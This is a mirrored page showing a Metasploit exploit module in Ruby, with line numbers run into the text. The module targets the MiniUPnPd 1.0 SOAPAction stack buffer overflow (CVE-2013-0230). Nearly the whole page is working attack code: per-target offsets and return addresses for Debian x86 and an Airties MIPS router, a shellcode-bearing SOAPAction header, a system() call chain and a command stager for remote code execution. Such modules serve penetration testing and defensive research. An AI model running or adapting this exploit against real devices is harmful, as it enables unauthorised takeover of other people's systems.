CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6include Msf::Exploit::Remote::HttpClient7include Msf::Exploit::CmdStager89Rank = NormalRanking1011def initialize(info = {})12super(update_info(info,13'Name' => 'MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution',14'Description' => %q{15This module exploits the MiniUPnP 1.0 SOAP stack buffer overflow vulnerability16present in the SOAPAction HTTP header handling.17},18'Author' =>19[20'hdm', # Vulnerability discovery21'Dejan Lukan', # Metasploit module, debian target22'Onur ALANBEL', # Expliot for Airties target23'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module, Airties target24],25'License' => MSF_LICENSE,26'DefaultOptions' => { 'EXITFUNC' => 'process', },27'Platform' => 'linux',28'Arch' => [ARCH_X86, ARCH_MIPSBE],29'References' =>30[31[ 'CVE', '2013-0230' ],32[ 'OSVDB', '89624' ],33[ 'BID', '57608' ],34[ 'URL', 'https://www.rapid7.com/blog/post/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play']35],36'Payload' =>37{38'DisableNops' => true39},40'Targets' =>41[42[ 'Debian GNU/Linux 6.0 / MiniUPnPd 1.0',43{44'Ret' => 0x0804ee43, # pop ebp # ret # from miniupnpd45'Offset' => 2123,46'Arch' => ARCH_X86,47# the byte '\x22' is the '"' character and the miniupnpd scans for that character in the48# input, which is why it can't be part of the shellcode (otherwise the vulnerable part49# of the program is never reached)50'Payload' =>51{52'Space' => 2060,53'BadChars' => "\x00\x22"54},55:callback => :target_debian56}57],58[ 'Airties RT-212 v1.2.0.23 / MiniUPnPd 1.0',59{60'Offset' => 2048,61'LibcBase' => 0x2aabd000,62'System' => 0x00031AC0,63'CallSystem' => 0x0001CC94, # prepare $a0 and jump to $s064'Fingerprint' => 'AirTies/ASP 1.0 UPnP/1.0 miniupnpd/1.0',65'Arch' => ARCH_MIPSBE,66:callback => :target_airties67}68]69],70'DefaultTarget' => 0,71'Privileged' => false,72'DisclosureDate' => '2013-03-27',73))7475register_options([76Opt::RPORT(5555),77])7879deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')80end8182def check83begin84res = send_request_cgi({85'method' => 'POST',86'uri' => '/'87})88rescue ::Rex::ConnectionError89return Exploit::CheckCode::Safe90end9192fingerprints = targets.collect { |t| t['Fingerprint'] }93fingerprints.delete(nil)9495if res && fingerprints.include?(res.headers['Server'])96vprint_status("Fingerprint: #{res.headers['Server']}")97return Exploit::CheckCode::Detected98end99100Exploit::CheckCode::Unknown101end102103def exploit104unless self.respond_to?(target[:callback])105fail_with(Failure::BadConfig, 'Invalid target specified: no callback function defined')106end107108self.send(target[:callback])109end110111def target_debian112#113# Build the SOAP Exploit114#115# jmp 0x2d ; jump forward 0x2d bytes (jump right after the '#' char)116sploit = "\xeb\x2d"117118# a valid action119sploit += "n:schemas-upnp-org:service:WANIPConnection:1#"120121# payload122sploit += payload.encoded123124# nops125sploit += rand_text(target['Offset'] - sploit.length - 16)126127# overwrite registers on stack: the values are not used, so we can overwrite them with anything128sploit += rand_text(4) # overwrite EBX129sploit += rand_text(4) # overwrite ESI130sploit += rand_text(4) # overwrite EDI131sploit += rand_text(4) # overwrite EBP132133# Overwrite EIP with addresss of "pop ebp, ret", because the second value on the134# stack points directly to the string after 'Soapaction: ', which is why we must135# throw the first value on the stack away, which we're doing with the pop ebp136# instruction. Then we're returning to the next value on the stack, which is137# exactly the address that we want.138sploit += [target.ret].pack('V')139140# the ending " character is necessary for the vulnerability to be reached141sploit += "\""142143# data sent in the POST body144data =145"<?xml version='1.0' encoding=\"UTF-8\"?>\r\n" +146"<SOAP-ENV:Envelope\r\n" +147" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\n" +148" xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\n" +149" xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\"\r\n" +150">\r\n" +151"<SOAP-ENV:Body>\r\n" +152"<ns1:action xmlns:ns1=\"urn:schemas-upnp-org:service:WANIPConnection:1\" SOAP-ENC:root=\"1\">\r\n" +153"</ns1:action>\r\n" +154"</SOAP-ENV:Body>\r\n" +155"</SOAP-ENV:Envelope>\r\n"156157#158# Build and send the HTTP request159#160print_status("Sending exploit to victim #{target.name}...")161send_request_cgi({162'method' => 'POST',163'uri' => "/",164'headers' => {165'SOAPAction' => sploit,166},167'data' => data,168})169170# disconnect from the server171disconnect172end173174def target_airties175print_status("Sending exploit to victim #{target.name}...")176execute_cmdstager(177:flavor => :echo178)179end180181def execute_command(cmd, opts)182# Build the SOAP Exploit183# a valid action184sploit = "n:schemas-upnp-org:service:WANIPConnection:1#"185sploit << rand_text_alpha_upper(target['Offset'])186sploit << [target['LibcBase'] + target['System']].pack("N") # s0 - address of system187sploit << rand_text_alpha_upper(24) # $s1 - $s6188sploit << [target['LibcBase'] + target['CallSystem']].pack("N")189# 0001CC94 addiu $a0, $sp, 0x18190# 0001CC98 move $t9, $s0191# 0001CC9C jalr $t9192# 0001CCA0 li $a1, 1193194sploit << rand_text_alpha_upper(24) #filler195sploit << cmd196197# data sent in the POST body198data =199"<?xml version='1.0' encoding=\"UTF-8\"?>\r\n" +200"<SOAP-ENV:Envelope\r\n" +201" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\n" +202" xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\n" +203" xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\"\r\n" +204">\r\n" +205"<SOAP-ENV:Body>\r\n" +206"<ns1:action xmlns:ns1=\"urn:schemas-upnp-org:service:WANIPConnection:1\" SOAP-ENC:root=\"1\">\r\n" +207"</ns1:action>\r\n" +208"</SOAP-ENV:Body>\r\n" +209"</SOAP-ENV:Envelope>\r\n"210211send_request_cgi({212'method' => 'POST',213'uri' => '/',214'headers' =>215{216'SOAPAction' => sploit,217},218'data' => data219})220end221end222223224